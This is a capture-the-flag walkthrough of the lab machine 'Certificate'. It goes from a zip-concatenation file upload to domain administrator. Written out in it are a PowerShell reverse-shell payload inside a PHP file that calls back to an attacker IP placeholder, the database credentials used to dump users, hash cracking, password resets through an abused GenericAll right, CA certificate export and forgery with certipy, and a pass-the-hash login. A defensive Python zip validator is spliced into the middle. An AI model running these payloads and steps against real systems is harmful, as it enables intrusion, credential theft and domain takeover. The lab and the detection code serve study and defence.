Certificate
First of all we need to go to the website http://certificate.htb, register and log in.
echo '10.10.11.71 certificate.htb DC01.certificate.htb' | sudo tee -a /etc/hosts
If we run gobuster we can see there's a PHP file called upload.php:
gobuster dir -u "http://certificate.htb" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -x
If we go to the website it says this:
So I fuzzed in Burp Suite (you can also do it with wfuzz) until I found a valid s_id:
http://certificate.htb/upload.php?s_id=FUZZ
In this case I will go to the http://certificate.htb/upload.php?s_id=36
Here we have a file upload feature.
Here I crafted my malicious .zip to get a reverse shell.
echo "I love Astro" > legit.pdf
zip benign.zip legit.pdf
mkdir malicious_files
cd malicious_files
nano shell.php
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOURIP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
cd ..
zip -r malicious.zip malicious_files/
cat benign.zip malicious.zip > combined.zip
Now upload the combined.zip
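As an added defender-side check that is not part of the original writeup, the script below shows why the concatenation works and how an upload handler could reject such a file: it locates every end-of-central-directory record in the blob and lists what the archive looks like when parsing stops at each one. The two sample archives are constructed inline; function names are my own.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"  # end-of-central-directory (EOCD) signature
EOCD_MIN_LEN = 22         # fixed part of the EOCD record; an optional comment follows


def make_zip(members: dict) -> bytes:
    """Build a small STORED archive in memory (used here only to construct sample input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


def eocd_offsets(data: bytes) -> list:
    """Offsets of every complete EOCD record; a well-formed archive has exactly one."""
    offsets, pos = [], data.find(EOCD_SIG)
    while pos != -1:
        if pos + EOCD_MIN_LEN <= len(data):
            offsets.append(pos)
        pos = data.find(EOCD_SIG, pos + 1)
    return offsets


def analyse_zip(data: bytes) -> dict:
    """Count EOCD records and list the members seen when parsing stops at each one.
    Unpackers disagree on which EOCD wins (zipfile honours the last), hence the split view."""
    offsets = eocd_offsets(data)
    views = []
    for off in offsets:
        comment_len = struct.unpack_from("<H", data, off + 20)[0]
        try:
            with zipfile.ZipFile(io.BytesIO(data[: off + EOCD_MIN_LEN + comment_len])) as zf:
                views.append(zf.namelist())
        except zipfile.BadZipFile:
            views.append(None)  # signature bytes inside member data, not a real record
    return {"eocd_count": len(offsets), "concatenated": len(offsets) > 1, "views": views}


def build_sample() -> bytes:
    """Constructed reproduction of the writeup's `cat benign.zip malicious.zip > combined.zip`."""
    benign = make_zip({"legit.pdf": "I love Astro\n"})
    trailing = make_zip({"malicious_files/shell.php": "<?php /* placeholder marker, no payload */ ?>\n"})
    return benign + trailing
```

A validator that accepts the upload when eocd_count is 1 and rejects anything else closes this particular trick regardless of which unpacker the server uses.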
To trigger the PHP execution, the upload generates a link; click it. In my case it was
http://certificate.htb/static/uploads/6fd6ce565d8e0c484086e1debee16872/legit.pdf
Then we need to change the URL like this:
http://certificate.htb/static/uploads/6fd6ce565d8e0c484086e1debee16872/malicious_files/shell.php
Before visiting it we set up our listener: nc -nlvp 4444
And we get a shell as xamppuser. Here we need to go a few directories back and read db.php.
I crafted this command to retrieve the users:
C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -D Certificate_WEBAPP_DB -e "SELECT * FROM users;"
This is the result.
Here we need to focus on Sara.B's hash; save it into hash.txt.
Then crack it with hashcat. I used this command:
hashcat -a 0 -m 3200 hash.txt /usr/share/wordlists/rockyou.txt -O
We get Sara.B's password: Blink182.
First of all I ran BloodHound to learn more about this AD.
bloodhound-python -u 'Sara.B' -p 'Blink182' -d certificate.htb -c All --zip -ns 10.10.11.71
Once in BloodHound, if we search for Sara.B and scroll down we can see Transitive Object Control.
Here we can see the following graph, which shows that Sara.B is a member of Account Operators.
If we go to the Account Operators group and then to Reachable High Value Targets, we can see that this group has GenericAll over LION.SK.
To abuse that we can simply run this command:
net rpc password "lion.sk" "newP@ssword2022" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
Now we can log in via WinRM with these credentials and we are in. The user flag is located in C:\Users\Lion.SK\Desktop\user.txt
For root, first we need to change Ryan.K's password and log in via WinRM.
This is the command I used:
net rpc password "Ryan.K" "newP@ssword2022" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
Once in the WinRM session, if we run whoami /priv we can see that Ryan.K has SeManageVolumePrivilege. To abuse it we can simply upload this .exe:
https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public
Download the .exe and upload it.
If we execute it we can see the following output.
Running this exploit means that Ryan.K now has Full Control over C:
Following this we can simply run the following command:
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx
Now we can download this ca.pfx to our machine.
With this ca.pfx we can forge our administrator.pfx.
So I ran this command:
certipy forge -ca-pfx ca.pfx \
-upn 'administrator@certificate.htb' \
-subject 'CN=Administrator,CN=Users,DC=certificate,DC=htb' \
-out forged_admin.pfx
The final step is to use certipy auth to get the Administrator hash:
certipy auth -pfx forged_admin.pfx \
-dc-ip 10.10.11.71 \
-username 'administrator' \
-domain 'certificate.htb'
Now we can log in via evil-winrm or psexec; I will show both methods in case one fails.
evil-winrm -i 10.10.11.71 -u administrator -H 'd803303515bf814ac14c5f1702abh866'
'aad3b435b51404eeaad3b435b51404ee:d803303515bf814ac14c5f1702abh866'
I changed the hashes :) so I can make sure everyone does this machine.